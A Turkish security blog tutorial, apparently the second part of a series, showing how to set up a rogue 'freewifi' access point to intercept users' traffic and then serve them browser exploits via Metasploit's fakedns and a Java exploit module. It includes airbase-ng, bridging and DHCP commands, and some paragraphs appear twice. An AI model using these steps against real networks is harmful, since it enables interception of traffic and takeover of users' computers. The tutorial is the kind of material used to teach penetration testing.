Yazının
ilk bölümünde kablosuz ağ kullanıcıları üzerinden ağa yetkisiz erişim
sağlanmasını hedefleyen yöntemler ele alınmıştı. İkinci bölümde ise
kullanıcıların bilgilerini ve bilgisayarlarını hedef alan saldırılar
anlatılmıştır. İlk yazıda kullanılan araç ve yöntemler ikincisine temel oluşturacağı için sırayla okunması daha faydalı olabilir.
ilk bölümünde kablosuz ağ kullanıcıları üzerinden ağa yetkisiz erişim
sağlanmasını hedefleyen yöntemler ele alınmıştı. İkinci bölümde ise
kullanıcıların bilgilerini ve bilgisayarlarını hedef alan saldırılar
anlatılmıştır. İlk yazıda kullanılan araç ve yöntemler ikincisine temel oluşturacağı için sırayla okunması daha faydalı olabilir.
Sahte AP ile Ortadaki Adam(MITM) Saldırısı
Bu
yöntem belirli bir ağın kullanıcılarını hedef alabileceği gibi sadece
ücretsiz internet erişimi sağlamak isteyen kullanıcıları da hedef
alabilir. Kablosuz kartı AP görevi görecek şekilde ayarlanıp ikinci bir
arayüzden de internet erişimi sağlanır. Kablosuz arayüz ile internet
erişimi olan arayüz arasında bir köprü kurulup hedef kullanıcıların
internete sorunsuz erişmesi sağlanır. Bu sırada bütün trafik kaydedilip
incelenebilir.
yöntem belirli bir ağın kullanıcılarını hedef alabileceği gibi sadece
ücretsiz internet erişimi sağlamak isteyen kullanıcıları da hedef
alabilir. Kablosuz kartı AP görevi görecek şekilde ayarlanıp ikinci bir
arayüzden de internet erişimi sağlanır. Kablosuz arayüz ile internet
erişimi olan arayüz arasında bir köprü kurulup hedef kullanıcıların
internete sorunsuz erişmesi sağlanır. Bu sırada bütün trafik kaydedilip
incelenebilir.
1. Kablosuz kartı monitör moduna alınır.
airmon-ng start wlan0
2. Sahte AP oluşturulur.
airbase-ng –essid freewifi -c 11 mon0
3. AP arayüzü ile internet erişimi olan arayüz arasında köprü oluşturulur. Benim durumumda bu eth0.
brctl addbr wbr
brctl addif wbr at0
brctl addif wbr eth0
at0 0.0.0.0 up
eth0 0.0.0.0 up
ifconfig wbr up
dhclient wbr (IP manual de verilebilir.)
4. Gelen paketleri yönlendirmek için IP Forwarding özelliği aktif edilir.
echo 1 > /proc/sys/net/ipv4/ip_forward
5. Sahte AP üzerinden bağlı olan kullanıcıların trafiğini dinlemek için at0 arayüzü kullanılabilir.
Metasploit’in Devreye Sokulması
Bir
önceki yönteme benzer bir yapı ile kullanmıcıların bilgisayarlarını
kontrol etmeyi amaçlayan saldırılar da yapılabilir. Yine sahte bir AP
oluşturulup bağlantı kuran hedef kullanıcılara çeşitli istismarlar ile
doğrudan saldırılabileceği gibi genelde kişisel bilgisayarlar üzerinde
etkili olma ihtimali daha yüksek bir yöntem olan sahte DNS cevaplarıyla
kullanıcıların tarayıcılarını hedef alan istismarlar barındıran bir
sunucuya yönlendirme seçeneği de uygulanabilir. İkinci yöntem daha
önceki araçlara ek olarak bir DHCP sunucusu ve Metasploit’in yardımıyla
uygulanabilir. Kurulum işlemleri konuyu dağıtmamak adına okuyucuya
bırakılmıştır.
önceki yönteme benzer bir yapı ile kullanmıcıların bilgisayarlarını
kontrol etmeyi amaçlayan saldırılar da yapılabilir. Yine sahte bir AP
oluşturulup bağlantı kuran hedef kullanıcılara çeşitli istismarlar ile
doğrudan saldırılabileceği gibi genelde kişisel bilgisayarlar üzerinde
etkili olma ihtimali daha yüksek bir yöntem olan sahte DNS cevaplarıyla
kullanıcıların tarayıcılarını hedef alan istismarlar barındıran bir
sunucuya yönlendirme seçeneği de uygulanabilir. İkinci yöntem daha
önceki araçlara ek olarak bir DHCP sunucusu ve Metasploit’in yardımıyla
uygulanabilir. Kurulum işlemleri konuyu dağıtmamak adına okuyucuya
bırakılmıştır.
1.
DHCP sunucusunun ayarları örnekteki gibi yapılabileceği gibi isteğe
göre farklı değerler de kullanılabilir. Örnekte DHCP sunucusu, sahte
DNS, sahte AP ve istismar sunucusu aynı bilgisayarda çalıştırılmıştır.
DHCP sunucusunun ayarları örnekteki gibi yapılabileceği gibi isteğe
göre farklı değerler de kullanılabilir. Örnekte DHCP sunucusu, sahte
DNS, sahte AP ve istismar sunucusu aynı bilgisayarda çalıştırılmıştır.
option domain-name-servers 192.168.1.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 192.168.1.0 netmask 255.255.255.0 {
range 192.168.1.5 192.168.1.250;
option routers 192.168.1.1;
option domain-name-servers 192.168.1.1;
}
2. Sahte AP başlatılır.
airbase-ng –essid freewifi -c 10 mon0
3. DHCP başlatılır.
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -d
4.
Metasploit tarafında çeşitli istismarlar seçilebilir ya da birden fazla
istismar için browser_autopwn modülü kullanılabilir. Örnekte
exploit/multi/browser/java_jre17_jmxbean_2 exploit modülü
kullanılmıştır. Örnek ayarlar:
Metasploit tarafında çeşitli istismarlar seçilebilir ya da birden fazla
istismar için browser_autopwn modülü kullanılabilir. Örnekte
exploit/multi/browser/java_jre17_jmxbean_2 exploit modülü
kullanılmıştır. Örnek ayarlar:
5. Metasploit’in fakedns modülü başlatılır.
Sistem hazır hale geldikten sonra kullanıcıların AP’ye bağlanıp herhangi bir sayfaya erişmeye çalışması beklenir.
Metasploit kullanımı hakkında detaylı bilgi için http://www.offensive-security.com/metasploit-unleashed/Main_Page adresinden yararlanılabilinir.
Onur ALANBEL <onur.alanbel@bga.com.tr>